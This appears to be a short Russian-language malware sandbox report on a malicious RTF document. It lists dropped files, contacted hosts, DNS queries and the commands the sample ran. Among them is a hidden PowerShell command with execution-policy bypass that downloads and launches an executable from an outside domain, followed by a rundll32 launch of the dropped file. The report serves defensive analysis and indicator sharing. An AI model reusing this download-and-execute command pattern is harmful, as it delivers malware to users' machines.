Техническая информация
- https://de-grisogoono.com/report_week.exe как %appdata%\report_final
- %TEMP%\abctfhghgdghgh‹.sct
- <Текущая директория>\~wrd0000.tmp
- %TEMP%\abctfhghgdghgh‹.sct
- <PATH_SAMPLE>.rtf
- 'de####sogoono.com':443
- 'oc##.#tartssl.com':80
- 'de####sogoono.com':443
- DNS ASK de####sogoono.com
- DNS ASK st####.rapidssl.com
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://de-grisogoono.com/report_week.exe','%APPDATA%\report_final');Start-Pr...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\report_final